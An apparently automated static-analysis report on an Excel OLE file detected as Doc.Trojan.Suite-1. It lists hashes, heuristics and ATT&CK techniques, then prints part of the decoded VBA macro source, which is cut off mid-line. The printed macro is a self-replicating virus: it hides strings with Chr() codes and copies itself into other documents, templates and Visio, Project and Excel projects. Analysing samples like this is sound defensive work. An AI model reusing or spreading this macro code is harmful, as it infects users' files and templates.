Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 36c051f528b3837d…

MALICIOUS

Office (OLE)

35.5 KB Created: 2000-07-29 14:33:01 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: c6651cc70fab7736ff587d5ee1226700 SHA-1: 41edfd9a6caabe8d17e36c1af8bd76f31d3e7aa9 SHA-256: 36c051f528b3837dcd8ad2c559dc882534c3442a88f81b92331999f56572d194
280 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The file is an Office document containing VBA macros. Heuristics indicate the use of Shell() and CreateObject() calls, common for executing malicious code. The macros appear to be designed to copy themselves to other projects and potentially download additional payloads, as suggested by the ClamAV detection 'Doc.Trojan.Suite-1'.

Heuristics 5

  • ClamAV: Doc.Trojan.Suite-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Suite-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 46828 bytes
SHA-256: 0c3889ff85e4bb8bdf8246f1d2a909e2d5bb85775ff2c5893b338144693e5540
Detection
ClamAV: Doc.Trojan.Suite-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "List1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "List2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "List3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Modul 1"
Sub Document_Close()
'
mut$ = "Visio.Application": mat$ = "Blank Drawing.vst": dovis = 1
On Error Resume Next
t = Application
If t = Chr(78) + Chr(111) + Chr(116) + Chr(104) + Chr(105) + Chr(110) + Chr(103) Then GoTo nopro
If t = "Microsoft Project" Then
mook = Version
 If mook = "8.0" Then
'
 End If
Application.DisplayAlerts = False
'
For Each Z In Projects
On Error Resume Next
Set ap = Z.VBProject.VBComponents(1).codemodule
Set tp = ThisProject.VBProject.VBComponents(1).codemodule
If ap.Lines(2, 1) <> "'" Then
ap.DeleteLines 1, ap.countoflines
ap.InsertLines 1, tp.Lines(1, tp.countoflines)
'
End If
Next Z
Set temp = Application.VBE.VBProjects(1).VBComponents(1).codemodule
If temp.Lines(2, 1) <> Chr(39) Then
temp.DeleteLines 1, temp.countoflines
temp.InsertLines 1, tp.Lines(1, tp.countoflines)
End If
End If
vi:
te$ = t: tune = Left(te$, 5)
If tune <> Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) Then
Set nom = ThisDocument.VBProject.VBComponents(1).codemodule
For i = 1 To Documents.Count
    Set docobj = Documents.Item(i)
Set gets = docobj.VBProject.VBComponents(1).codemodule
If gets.Lines(2, 1) <> Chr(39) Then
gets.InsertLines 1, nom.Lines(1, nom.countoflines)
dname = CurDir & "\": filechk$ = (dname & docobj)
mystr = Right(filechk$, 4): If mystr <> ".vsd" Then sd = 0
mystr = Right(filechk$, 4): If mystr <> ".vss" Then sd = 0
mystr = Right(filechk$, 4): If mystr <> ".vst" Then sd = 0
If sd = 0 Then fila$ = (dname & docobj & ".vsd")
'
End If
toobig:
Next i
If strTemplatename = "" Then GoTo runaway
'
Set Target = Documents.Open(strTemplatename)
Set targets = Target.VBProject.VBComponents(1).codemodule
If targets.Lines(2, 1) <> "'" Then
If targets.Lines(1, 1) = "Option Explicit" Then Target.DeleteLines 1, 1
targets.InsertLines 1, rnt.Lines(1, rnt.countoflines)
Target.SaveAs strTemplatename
Else
toobigtemplate:
Target.Close
End If
runaway:
End If
If t = Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr(102) + Chr(116) + Chr(32) + Chr(87) + Chr(111) + Chr(114) + Chr(100) Then Else GoTo ex
Options.SendMailAttach = True: m = 1
Set nim = NormalTemplate
Set aiv = ActiveDocument
Set aktiv = aiv.VBProject.VBComponents(m).codemodule
Set nom = nim.VBProject.VBComponents(m).codemodule
If nom.Lines(2, 1) <> "'" Then
nom.DeleteLines 1, nom.countoflines
nom.InsertLines 1, aktiv.Lines(1, aktiv.countoflines)
nom.replaceline 1, Chr(83) + Chr(117) + Chr(98) + Chr(32) + Chr(68) + Chr(111) + Chr(99) + Chr(117) + Chr(109) + Chr(101) + Chr(110) + Chr(116) + Chr(95) + Chr(67) + Chr(108) + Chr(111) + Chr(115) + Chr(101) + Chr(40) + Chr(41)
nop = 1
End If
If aktiv.Lines(2, 1) <> "'" Then
act = 1
End If
ex:
If act = 1 Then GoTo 11
If t = "Microsoft Excel" Then Else GoTo 12
Set a = ActiveWorkbook.VBProject
Set aktiv = a.VBComponents("ThisWorkbook").codemodule
Set nimt = ThisWorkbook.VBProject
Set nom = nimt.VBComponents("ThisWorkbook").codemodule
11:
If aktiv.Lines(2, 1) <
... (truncated)